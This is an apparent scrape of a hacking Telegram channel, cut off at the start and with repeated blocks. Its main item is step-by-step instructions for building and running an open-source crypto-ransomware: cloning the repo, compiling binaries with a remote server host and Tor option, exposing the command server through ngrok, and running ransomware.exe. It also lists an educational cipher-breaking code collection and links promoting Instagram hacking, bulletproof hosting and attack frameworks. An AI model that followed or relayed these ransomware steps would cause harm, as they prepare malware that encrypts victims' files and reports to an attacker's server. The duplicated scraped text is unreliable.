After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
9) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
10) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
11) If you see a OK and some logs in the server output you are ready to go.
Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
12) Then simply run the ransomware.exe and see the magic happens
Verified
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The original crypto- free - Ransomware :))
F E A T U R E S :
Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an
entire file into memory.
Walk all drives by default.
Docker image for compilation.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
First of all download the project outside your $GOPATH:
1) git clone github.com/mauri870/ransomware
2) cd ransomware
If you have Docker skip to the next section.
You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
3) export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
4) Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
make deps
make
5) You can build the server for windows with make -e GOOS=windows.
(Docker
./build-docker.sh make)
6) First of all lets start our external domain:
ngrok http 8080
7) This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
8) The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
9) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
10) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
11) If you see a OK and some logs in the server output you are ready to go.
Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
12) Then simply run the ransomware.exe and see the magic happens
Verified
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mauri870/ransomware: A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB
A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB - mauri870/ransomware
TODAY TOPICS :
2020 insta hack
https://t.me/UnderCodeTesting/11731
tcp/ unixsecurity / tcp WRAPPERS / SHELL / LINUXNET
LINUX TWEAK TUTORIALS .HTML
https://t.me/UnderCodeTesting/11732
https://t.me/UnderCodeTesting/11740
Framework designed to automate various wireless networks attacks
https://t.me/UnderCodeTesting/11741
post login box injection in SQLMAP
https://t.me/UnderCodeTesting/11742
NEW TWITTER BOT FOR AUTOMATE
https://t.me/UnderCodeTesting/11744
AI Product Manager Nanodegree legal Course
https://t.me/UnderCodeTesting/11745
OWASP APICheck - DevSecOps Toolkit for HTTP API
https://t.me/UnderCodeTesting/11747
What is the difference between "5G" and "Wi-Fi 6" and how to use them properly?
https://t.me/UnderCodeTesting/11748
Methode for protect yourself from iploggers ?
https://t.me/UnderCodeTesting/11749
Some good New Proxies
https://t.me/UnderCodeTesting/11750
ways to boot Windows 10 in Safe Mode
https://t.me/UnderCodeTesting/11751
Bulletproof Hosting List (2020 Version)
https://t.me/UnderCodeTesting/11752
How to set up and manage log rotation using Logrotate on Linux
https://t.me/UnderCodeTesting/11753
HACK Windows, Linux, macOS or even BSD systems
https://t.me/UnderCodeTesting/11754
How can a Neptune exploit kit distributes Monero miner ?
https://t.me/UnderCodeTesting/11755
The original crypto- free - Ransomwareπ§ββοΈ
https://t.me/UnderCodeTesting/11756
ENJOY β€οΈππ» & USE FOR LEARN !
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
2020 insta hack
https://t.me/UnderCodeTesting/11731
tcp/ unixsecurity / tcp WRAPPERS / SHELL / LINUXNET
LINUX TWEAK TUTORIALS .HTML
https://t.me/UnderCodeTesting/11732
https://t.me/UnderCodeTesting/11733Top reversed eng/ malwares in one repo
https://t.me/UnderCodeTesting/11734
https://t.me/UnderCodeTesting/11735
https://t.me/UnderCodeTesting/11736
https://t.me/UnderCodeTesting/11737
https://t.me/UnderCodeTesting/11738
https://t.me/UnderCodeTesting/11740
Framework designed to automate various wireless networks attacks
https://t.me/UnderCodeTesting/11741
post login box injection in SQLMAP
https://t.me/UnderCodeTesting/11742
NEW TWITTER BOT FOR AUTOMATE
https://t.me/UnderCodeTesting/11744
AI Product Manager Nanodegree legal Course
https://t.me/UnderCodeTesting/11745
OWASP APICheck - DevSecOps Toolkit for HTTP API
https://t.me/UnderCodeTesting/11747
What is the difference between "5G" and "Wi-Fi 6" and how to use them properly?
https://t.me/UnderCodeTesting/11748
Methode for protect yourself from iploggers ?
https://t.me/UnderCodeTesting/11749
Some good New Proxies
https://t.me/UnderCodeTesting/11750
ways to boot Windows 10 in Safe Mode
https://t.me/UnderCodeTesting/11751
Bulletproof Hosting List (2020 Version)
https://t.me/UnderCodeTesting/11752
How to set up and manage log rotation using Logrotate on Linux
https://t.me/UnderCodeTesting/11753
HACK Windows, Linux, macOS or even BSD systems
https://t.me/UnderCodeTesting/11754
How can a Neptune exploit kit distributes Monero miner ?
https://t.me/UnderCodeTesting/11755
The original crypto- free - Ransomwareπ§ββοΈ
https://t.me/UnderCodeTesting/11756
ENJOY β€οΈππ» & USE FOR LEARN !
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦hack passwords and more / Cipher
affineBreaker.py: Break Affine Cipher-encrypted messages.
affineCipher.py: Encrypt and decrypt using the Affine Cipher.
al_sweigart_privkey.txt: A sample private key file that is used by the rsaCipher.py program.
al_sweigart_pubkey.txt: A sample public key file that is used by the rsaCipher.py program.
buggy.py: Used as practice for using Python's debugger.
caesarBreaker.py: Break Caesar Cipher-encrypted messages.
caesarCipher.py: Encrypts and decrypts using the Caesar Cipher.
coinFlips.py: Used as practice for using Python's debugger.
detectEnglish.py: Used to detect if a string is English.
dictionary.txt: A dictionary file of English words, one per line.
encrypted_file.txt: A sample encrypted file from the
frankenstein.txt: A large text file sample. (The public domain novel Frankenstein.)
freqFinder.py: Module for gathering letter frequency statistics.
makeRsaKeys.py: Generate a public/private RSA key pair.
nullBreaker.py: Breaks Null Cipher-encrypted messages.
nullCipher.py: Encrypts and decrypts using the Null Cipher.
primeSieve.py: Generates prime numbers using the Sieve of Erastothenes algorithm
pyperclip.py: A module for copying and pasting to the clipboard. This source code isn't going to be featured in the book, and is only included so that people can test the programs that use it.
rabinMiller.py: Module for primality testing using the Rabin-Miller algorithm.
README.md: The file that you are reading right now, silly. :D
reverseCipher.py: Encrypts with the reverse "cipher", which just reverse the string.
rsaCipher.py: Encrypts and decrypts using the RSA Cipher.
simpleSubBreaker.py: Breaks Simple Substitution Cipher-encrypted messages.
simpleSubCipher.py: Encrypts and decrypts using the Simple Substitution Cipher.
simpleSubKeyword.py: Encrypts and decrypts using the Simple Substitution Cipher, using an English word for the key.
transpositionBreaker.py: Breaks Transposition Cipher-encrypted messages.
transpositionCipherFile.py: Encrypts and decrypts files using the Transposition Cipher.
transpositionDecrypt.py: Decrypts messages using the Transposition Cipher.
transpositionEncrypt.py: Encrypts messages using the Transposition Cipher.
transpositionFileBreaker.py: Breaks Transposition Cipher-encrypted files.
transpositionTest.py: Tests to see if the Transposition Cipher program works.
vigenereBreaker.py: Breaks Vigenere Cipher-encrypted messages.
vigenereCipher.py: Encrypts and decrypts using the Vigenere Cipher.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/asweigart/codebreaker
2) cd codebreaker
3) choose the python and execute with
> python example..py
4) choose a option and hack
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦hack passwords and more / Cipher
affineBreaker.py: Break Affine Cipher-encrypted messages.
affineCipher.py: Encrypt and decrypt using the Affine Cipher.
al_sweigart_privkey.txt: A sample private key file that is used by the rsaCipher.py program.
al_sweigart_pubkey.txt: A sample public key file that is used by the rsaCipher.py program.
buggy.py: Used as practice for using Python's debugger.
caesarBreaker.py: Break Caesar Cipher-encrypted messages.
caesarCipher.py: Encrypts and decrypts using the Caesar Cipher.
coinFlips.py: Used as practice for using Python's debugger.
detectEnglish.py: Used to detect if a string is English.
dictionary.txt: A dictionary file of English words, one per line.
encrypted_file.txt: A sample encrypted file from the
frankenstein.txt: A large text file sample. (The public domain novel Frankenstein.)
freqFinder.py: Module for gathering letter frequency statistics.
makeRsaKeys.py: Generate a public/private RSA key pair.
nullBreaker.py: Breaks Null Cipher-encrypted messages.
nullCipher.py: Encrypts and decrypts using the Null Cipher.
primeSieve.py: Generates prime numbers using the Sieve of Erastothenes algorithm
pyperclip.py: A module for copying and pasting to the clipboard. This source code isn't going to be featured in the book, and is only included so that people can test the programs that use it.
rabinMiller.py: Module for primality testing using the Rabin-Miller algorithm.
README.md: The file that you are reading right now, silly. :D
reverseCipher.py: Encrypts with the reverse "cipher", which just reverse the string.
rsaCipher.py: Encrypts and decrypts using the RSA Cipher.
simpleSubBreaker.py: Breaks Simple Substitution Cipher-encrypted messages.
simpleSubCipher.py: Encrypts and decrypts using the Simple Substitution Cipher.
simpleSubKeyword.py: Encrypts and decrypts using the Simple Substitution Cipher, using an English word for the key.
transpositionBreaker.py: Breaks Transposition Cipher-encrypted messages.
transpositionCipherFile.py: Encrypts and decrypts files using the Transposition Cipher.
transpositionDecrypt.py: Decrypts messages using the Transposition Cipher.
transpositionEncrypt.py: Encrypts messages using the Transposition Cipher.
transpositionFileBreaker.py: Breaks Transposition Cipher-encrypted files.
transpositionTest.py: Tests to see if the Transposition Cipher program works.
vigenereBreaker.py: Breaks Vigenere Cipher-encrypted messages.
vigenereCipher.py: Encrypts and decrypts using the Vigenere Cipher.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/asweigart/codebreaker
2) cd codebreaker
3) choose the python and execute with
> python example..py
4) choose a option and hack
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - asweigart/codebreaker: "Hacking Secret Ciphers with Python" programs
"Hacking Secret Ciphers with Python" programs. Contribute to asweigart/codebreaker development by creating an account on GitHub.
Wordpress Exploit verified for 5.5.2 version
https://github.com/WordPress/wordpress-develop/commit/d5ddd6d4be1bc9fd16b7796842e6fb26315705ad
https://github.com/WordPress/wordpress-develop/commit/d5ddd6d4be1bc9fd16b7796842e6fb26315705ad
GitHub
Meta: Sanitize meta key before checking protection status. Β· WordPress/wordpress-develop@d5ddd6d
Props zieladam, peterwilsoncc, xknown, whyisjake.
Merges [49377,49381] to trunk.
git-svn-id: https://develop.svn.wordpress.org/trunk@49387 602fd350-edb4-49c9-b593-d223f7449a82
Merges [49377,49381] to trunk.
git-svn-id: https://develop.svn.wordpress.org/trunk@49387 602fd350-edb4-49c9-b593-d223f7449a82
Forwarded from UNDERCODE NEWS